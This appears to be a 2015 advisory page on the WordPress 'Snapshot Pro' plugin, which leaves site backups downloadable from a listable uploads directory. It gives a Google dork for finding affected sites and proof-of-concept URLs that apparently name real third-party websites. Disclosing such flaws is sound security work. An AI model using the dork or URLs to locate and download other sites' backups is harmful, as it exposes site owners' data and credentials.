WordPress 'Snapshot Pro' Plugin Exposure Backup File to Unauthorized Control

2015.05.18

Credit: Hugo Santiago dos Santos

Risk: High

Local: No

Remote: Yes

CVE: CWE-530

CWE: N/A

Dork: \"Index of\" +/wp-content/uploads/snapshots/

# WordPress 'Snapshot Pro' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://premium.wpmudev.org/project/snapshot/
# Google Dork: "Index of" +/wp-content/uploads/snapshots/

# PoC :

http://trapshootingonXline.com/wp-content/uploads/snapshots/"RANDOM DIR"/"NAME OF BACKUP"
http://trapshootingoXnline.com/wp-content/uploads/snapshots/
http://forsythchurcXhofchrist.net/wp-content/uploads/snapshots/
http://www.bardoXlatry.com/wp-content/uploads/snapshots/4ljtmn0hfg0kvmifobvrfdsdv2/

# Xploit:

 After using Dork Google("Index of" +/wp-content/uploads/snapshots/), we can access directory of backup freely ("/wp-content/uploads/snapshots/"), and All of backups will be there to download(Compress .tar.gz).

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress 'Snapshot Pro' Plugin Exposure Backup File to Unauthorized Control

Dork: \"Index of\" +/wp-content/uploads/snapshots/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.